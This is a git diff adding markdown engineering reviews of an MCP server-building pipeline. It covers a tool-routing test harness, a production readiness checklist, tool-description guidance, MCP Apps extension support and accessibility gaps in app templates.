bVal = b[colKey]; + if (aVal == null) return 1; + if (bVal == null) return -1; + if (typeof aVal === 'number' && typeof bVal === 'number') { + return gridState.sortDir === 'asc' ? aVal - bVal : bVal - aVal; + } + aVal = String(aVal).toLowerCase(); + bVal = String(bVal).toLowerCase(); + const cmp = aVal.localeCompare(bVal); + return gridState.sortDir === 'asc' ? cmp : -cmp; + }); +} +``` + +### MEDIUM: Add LLM-in-the-Loop Tool Routing Test Harness + +Add to QA tester skill: + +```typescript +// tests/llm-routing.test.ts +// This test REQUIRES an LLM endpoint (Claude API or local proxy) + +const LLM_ENDPOINT = process.env.LLM_TEST_ENDPOINT || 'http://localhost:3001/v1/chat/completions'; + +interface RoutingTestCase { + message: string; + expectedTool: string; + systemPrompt: string; // from channel config +} + +async function testToolRouting(testCase: RoutingTestCase): Promise<{ + correct: boolean; + selectedTool: string | null; + latencyMs: number; +}> { + const start = performance.now(); + + const response = await fetch(LLM_ENDPOINT, { + method: 'POST', + headers: { 'Content-Type': 'application/json' }, + body: JSON.stringify({ + model: 'claude-sonnet-4-20250514', + messages: [ + { role: 'system', content: testCase.systemPrompt }, + { role: 'user', content: testCase.message }, + ], + tools: loadToolDefinitions(), // From compiled server + tool_choice: 'auto', + }), + }); + + const data = await response.json(); + const latencyMs = Math.round(performance.now() - start); + const toolCall = data.choices?.[0]?.message?.tool_calls?.[0]; + const selectedTool = toolCall?.function?.name || null; + + return { + correct: selectedTool === testCase.expectedTool, + selectedTool, + latencyMs, + }; +} +``` + +### LOW: Add Monorepo Structure for Multi-Server Management + +For managing 30+ servers, recommend a workspace structure: + +``` +mcp-servers/ +├── package.json # Workspace root +├── turbo.json # Turborepo config for parallel builds +├── shared/ +│ ├── client/ # Shared API client base class +│ ├── logger/ # Shared logger +│ └── types/ # Shared TypeScript types +├── servers/ +│ ├── calendly-mcp/ +│ ├── mailchimp-mcp/ +│ ├── zendesk-mcp/ +│ └── ... (30+ servers) +└── scripts/ + ├── build-all.sh + ├── health-check-all.sh + └── update-deps.sh +``` + +--- + +## Operational Readiness Checklist (Must Exist Before Deploying to Production) + +### Infrastructure (P0 — blocking) + +- [ ] **Containerization:** Every server has a Dockerfile and can be built/deployed as a container +- [ ] **Process management:** PM2, systemd, or Kubernetes manifests for all servers (not manual `node dist/index.js`) +- [ ] **Health monitoring:** Centralized health dashboard that polls all servers every 60s +- [ ] **Alerting:** Circuit breaker trips → Slack/PagerDuty alert within 5 minutes +- [ ] **Log aggregation:** All server stderr → centralized logging (Loki, Datadog, or similar) +- [ ] **Secrets management:** API keys NOT in plaintext .env files — use encrypted store or secrets manager +- [ ] **Resource limits:** Memory + CPU limits per server process (containers or cgroups) + +### Code Quality (P0 — blocking) + +- [ ] **Circuit breaker race condition fixed** (half-open mutex) +- [ ] **Retry jitter added** (prevent thundering herd) +- [ ] **HTTP session TTL + max limit** (prevent memory leak) +- [ ] **OAuth token refresh mutex** (prevent concurrent refresh) +- [ ] **postMessage origin validation** in all app templates +- [ ] **CSP meta tag** in all app templates +- [ ] **String-based escapeHtml** (not DOM-based) + +### Testing (P0 — blocking) + +- [ ] **MCP Inspector passes** for every server +- [ ] **TypeScript compiles clean** for every server +- [ ] **axe-core score >90%** for every app +- [ ] **XSS test passes** for every app +- [ ] **At least 20 tool routing fixtures** per server + +### Testing (P1 — should have) + +- [ ] **LLM-in-the-loop routing tests** for critical channels +- [ ] **Playwright visual regression baselines** captured +- [ ] **Load test:** 10 concurrent users per HTTP server without degradation +- [ ] **Chaos test:** API-down scenario completes gracefully +- [ ] **Smoke test script** for post-deployment validation + +### Operations (P1 — should have) + +- [ ] **Runbook:** "API is down" — steps for each integrated API +- [ ] **Runbook:** "Server OOM" — diagnosis and restart procedure +- [ ] **Runbook:** "Wrong data rendered" — debugging data flow +- [ ] **Dependency update cadence:** Monthly `npm audit` + quarterly SDK updates +- [ ] **API version monitoring:** Quarterly check for deprecation notices +- [ ] **Backup:** LocalBosses localStorage thread data export capability + +### Security (P0 for production, P1 for internal) + +- [ ] **No API keys in client-side code** (HTML apps, browser-accessible JS) +- [ ] **Tool descriptions reviewed for injection** — no hidden instructions +- [ ] **Audit logging** for destructive operations (delete, update) +- [ ] **Rate limiting** on tool calls (max N calls per minute per user) +- [ ] **Input sanitization** on tool parameters that touch external systems + +--- + +## Final Assessment + +### What's Excellent +The MCP Factory pipeline is architecturally sound. The 6-phase approach with quality gates, the comprehensive testing framework, and the attention to MCP spec compliance (2025-11-25) are all above-average for the industry. The API analyzer skill is particularly strong — the pagination catalog, tool description formula, and token budget awareness show deep expertise. + +### What Would Break Under Load +1. HTTP session memory leak (will OOM in days under moderate traffic) +2. Circuit breaker allowing all requests through in half-open (can DDoS a recovering API) +3. No retry jitter (thundering herd when API recovers) +4. No process management (30 servers = 30 unmonitored Node processes) + +### What's Missing for Enterprise +1. MCP Gateway/proxy layer (Microsoft, IBM, Envoy all provide this — needed for centralized auth, routing, observability) +2. Container orchestration (Docker + K8s manifests) +3. Centralized secrets management +4. Audit trail for tool invocations +5. Rate limiting at the MCP layer (not just API layer) +6. LLM-in-the-loop testing (the most important test, yet the hardest) + +### Recommendation +Fix the 4 critical code issues (circuit breaker, jitter, session leak, token mutex). Add Dockerfiles. Set up PM2 or equivalent. Then you can ship to production for internal use. For bank-grade production, add the MCP Gateway layer and secrets management. + +--- + +*Signed: Director Mei — "If the circuit breaker has a race condition, don't deploy it. Period."* diff --git a/mcp-factory-reviews/gamma-aiux-review.md b/mcp-factory-reviews/gamma-aiux-review.md new file mode 100644 index 0000000..245bd29 --- /dev/null +++ b/mcp-factory-reviews/gamma-aiux-review.md @@ -0,0 +1,792 @@ +# Agent Gamma — AI/UX & Testing Review + +**Reviewer:** Agent Gamma (AI/UX & Testing Methodology Expert) +**Date:** February 4, 2026 +**Scope:** All 5 MCP Factory skills + master blueprint +**Research basis:** Paragon tool-calling benchmarks, Statsig agent architecture patterns, MCP Apps official spec (Jan 2026), Prompt Engineering Guide (function calling), Confident AI agent evaluation framework, WCAG 2.1 accessibility standards, Berkeley Function Calling Leaderboard findings, visual regression tooling landscape + +--- + +## Executive Summary + +- **Tool descriptions are the pipeline's hidden bottleneck.** The current "What/Returns/When" formula is good but insufficient — research shows tool descriptions need *negative examples* ("do NOT use when..."), *disambiguation cues* between similar tools, and *output shape previews* to reach >95% routing accuracy. With 30+ servers averaging 20+ tools each, misrouting will be the #1 user-facing failure mode. + +- **The official MCP Apps extension (shipped Jan 2026) makes our iframe/postMessage architecture semi-obsolete.** MCP now has `ui://` resource URIs, `_meta.ui.resourceUri` on tools, and bidirectional JSON-RPC over postMessage. Our skill documents don't mention this at all — we're building to a 2025 pattern while the spec has moved forward. + +- **Testing is the weakest link in the pipeline.** The QA skill has the right layers but lacks quantitative metrics (tool correctness rate, task completion rate), has no automated regression baseline, no accessibility auditing, and no test data fixtures. It's a manual checklist masquerading as a testing framework. + +- **Accessibility is completely absent.** Zero mention of ARIA attributes, keyboard navigation, focus management, screen reader support, or WCAG contrast ratios across all 5 skills. Our dark theme palette fails WCAG AA for secondary text (#96989d on #1a1d23 = 3.7:1, needs 4.5:1). + +- **App UX patterns are solid for static rendering but miss all interactive patterns.** No drag-and-drop (kanban reordering), no inline editing, no real-time streaming updates, no optimistic UI, no undo/redo, no keyboard shortcuts, no search-within-app. Apps feel like screenshots, not tools. + +--- + +## Per-Skill Reviews + +### 1. MCP API Analyzer (Phase 1) + +**Strengths:** +- Excellent reading priority hierarchy (auth → rate limits → overview → endpoints) +- The "speed technique for large APIs" using OpenAPI specs is smart +- App candidate selection criteria are well-reasoned (BUILD when / SKIP when) +- Template is thorough and would produce consistent outputs + +**Issues & Suggestions:** + +**🔴 Critical: Tool description formula needs upgrading** + +The current formula is: +``` +{What it does}. {What it returns}. {When to use it / what triggers it}. +``` + +Research from Paragon's 50-test-case benchmark (2025) and the Prompt Engineering Guide shows this needs expansion. Better formula: + +``` +{What it does}. {What it returns — include 2-3 key field names}. +{When to use it — specific user intents}. {When NOT to use it — disambiguation}. +{Side effects — if any}. +``` + +**Example upgrade:** +``` +# Current (from skill) +"List contacts with optional filters. Returns paginated results including name, email, phone, +and status. Use when the user wants to see, search, or browse their contact list." + +# Improved +"List contacts with optional filters and pagination. Returns {name, email, phone, status, +created_date} for each contact. Use when the user wants to browse, filter, or get an overview +of multiple contacts. Do NOT use for searching by specific keyword (use search_contacts instead) +or for getting full details of one contact (use get_contact instead)." +``` + +The "do NOT use" disambiguation is the single highest-impact improvement per Paragon's research — it reduced tool misrouting by ~30% in their benchmarks. + +**🟡 Important: Missing tool count optimization guidance** + +The skill says "aim for 5-15 groups, 3-15 tools per group" but doesn't address total tool count impact. Research from Berkeley Function Calling Leaderboard and the Medium analysis on tool limits shows: +- **1-10 tools:** High accuracy, minimal degradation +- **10-20 tools:** Noticeable accuracy drops begin +- **20+ tools:** Significant degradation; lazy loading helps but descriptions still crowd the context + +**Recommendation:** Add guidance to cap *active* tools at 15-20 per interaction via lazy loading, and add a "tool pruning" section for aggressively combining similar tools (e.g., `list_contacts` + `search_contacts` → single tool with optional `query` param). + +**🟡 Important: No semantic clustering guidance** + +When tools have overlapping names (e.g., `list_invoices`, `get_invoice_summary`, `get_invoice_details`), LLMs struggle. Add guidance for: +- Using verb prefixes that signal intent: `browse_` (list/overview), `inspect_` (single item deep-dive), `modify_` (create/update), `remove_` (delete) +- Grouping mutually exclusive tools with "INSTEAD OF" notes in descriptions + +**🟢 Nice-to-have: Add example disambiguation table** + +For each tool group, produce a disambiguation matrix: + +| User says... | Correct tool | Why not others | +|---|---|---| +| "Show me all contacts" | list_contacts | Not search (no keyword), not get (not specific) | +| "Find John Smith" | search_contacts | Not list (specific name = search), not get (no ID) | +| "What's John's email?" | get_contact | Not list/search (asking about specific known contact) | + +--- + +### 2. MCP Server Builder (Phase 2) + +**Strengths:** +- Solid project scaffolding with good defaults +- Auth pattern catalog covers the common cases well +- MCP Annotations decision matrix is clear and correct +- Error handling pattern (Zod → client → server levels) is well-layered +- One-file vs modular threshold (15 tools) is practical + +**Issues & Suggestions:** + +**🔴 Critical: Missing MCP Apps extension support** + +As of January 2026, MCP has an official Apps extension (`@modelcontextprotocol/ext-apps`). This changes how tools declare UI: + +```typescript +// NEW PATTERN: Tool declares its UI resource +registerAppTool(server, "get-time", { + title: "Get Time", + description: "Returns the current server time.", + inputSchema: {}, + _meta: { ui: { resourceUri: "ui://get-time/mcp-app.html" } }, +}, async () => { /* handler */ }); + +// Resource serves the HTML +registerAppResource(server, resourceUri, resourceUri, + { mimeType: RESOURCE_MIME_TYPE }, + async () => { /* return HTML */ } +); +``` + +Our servers should be built to support BOTH our custom LocalBosses postMessage pattern AND the official MCP Apps protocol. This future-proofs the servers for use in Claude Desktop, VS Code Copilot, and other MCP hosts. + +**Action:** Add a section on `_meta.ui.resourceUri` registration. Update the tool definition interface to include optional `_meta` field. + +**🟡 Important: Tool description in code doesn't match analysis guidance** + +The builder skill's tool group template has descriptions that are shorter and less detailed than what the analyzer skill recommends. The code template shows: + +```typescript +description: "List contacts with optional filters and pagination. Returns name, email, phone, and status. Use when the user wants to see, search, or browse contacts." +``` + +But the Zod schema descriptions are separate and minimal: +```typescript +page: z.number().optional().default(1).describe("Page number (default 1)") +``` + +**Issue:** Parameter descriptions in Zod `.describe()` aren't always surfaced by MCP clients. The parameter descriptions in `inputSchema.properties[].description` are what matters for tool selection. Add explicit guidance: "Always put the most helpful description in `inputSchema.properties`, not just in Zod." + +**🟡 Important: No output schema guidance** + +Tool definitions include `inputSchema` but nothing about expected output shapes. While MCP doesn't formally require output schemas, providing an output hint in the tool description massively helps: +1. The LLM knows what data it will get back +2. The LLM can better plan multi-step tool chains +3. App designers know exactly what fields to expect + +Add to the tool definition template: +```typescript +// In the description: +"Returns: { data: Contact[], meta: { total, page, pageSize } } where Contact has {name, email, phone, status}" +``` + +**🟢 Nice-to-have: Add streaming support pattern** + +For tools that return large datasets, add a streaming pattern using MCP's progress notifications. This is especially relevant for list/search operations that may take 2-5 seconds. + +--- + +### 3. MCP App Designer (Phase 3) + +**Strengths:** +- Comprehensive design system with specific hex values and spacing +- The 8 app type templates cover the most common patterns +- Three-state requirement (loading/empty/data) is excellent +- Data reception with both postMessage + polling is robust +- Responsive breakpoints and CSS are production-ready + +**Issues & Suggestions:** + +**🔴 Critical: No accessibility at all** + +The entire skill has zero mention of: +- **ARIA attributes** — Tables need `role="table"`, status badges need `role="status"` or `aria-label` +- **Keyboard navigation** — Interactive elements must be focusable and operable with Enter/Space +- **Focus management** — When data loads and replaces skeleton, focus should move to content +- **Color contrast** — Secondary text (#96989d on #1a1d23) = **3.7:1 ratio**. WCAG AA requires 4.5:1 for normal text. Fix: use `#b0b2b8` for secondary text (5.0:1) +- **Screen reader announcements** — Data state changes should use `aria-live="polite"` regions +- **Reduced motion** — The shimmer animation should respect `prefers-reduced-motion` + +**Minimum additions to base template:** +```html + +
+ Loading... + +
+ + +